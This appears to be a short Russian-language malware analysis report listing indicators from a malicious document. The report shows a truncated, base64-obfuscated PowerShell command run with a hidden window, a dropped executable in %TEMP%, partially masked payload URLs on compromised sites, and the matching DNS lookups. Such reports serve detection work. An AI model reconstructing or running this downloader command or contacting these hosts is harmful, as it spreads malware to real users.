Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAHUAOQA0AF8AZQBiAD0AKAAnAE4AMQAnACsAKAAnAGkAdQAnACsAJwBsAG8ANQAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgBWADoAdABFAG0AcABcAHcATwByAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...
- %TEMP%\word\2019\gazs3186m.exe
- %TEMP%\word\2019\gazs3186m.exe
- %TEMP%\word\2019\gazs3186m.exe
- http://th#####angemascot.com/cgi-bin/EPorHOo/
- http://za###moden.com/wp-admin/oyF/
- http://www.ta#####cnoracing.com/font/vQDBrVh/
- http://www.ta#####cnoracing.com/en/
- http://wi####nscheiden.com/golfupdate.nl/Vlq60c/
- http://ya###resort.net/wp-admin/6Jwnw/
- http://ya###resort.net/cgi-sys/suspendedpage.cgi
- http://su####vithomes.com/wp-includes/WNy9/
- DNS ASK th#####angemascot.com
- DNS ASK za###moden.com
- DNS ASK ta#####cnoracing.com
- DNS ASK wi####nscheiden.com
- DNS ASK ya###resort.net
- DNS ASK su####vithomes.com
- DNS ASK xi####italia.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAHUAOQA0AF8AZQBiAD0AKAAnAE4AMQAnACsAKAAnAGkAdQAnACsAJwBsAG8ANQAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUATgBWADoAdABFAG0AcABcAHcATwByAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...' (со скрытым окном)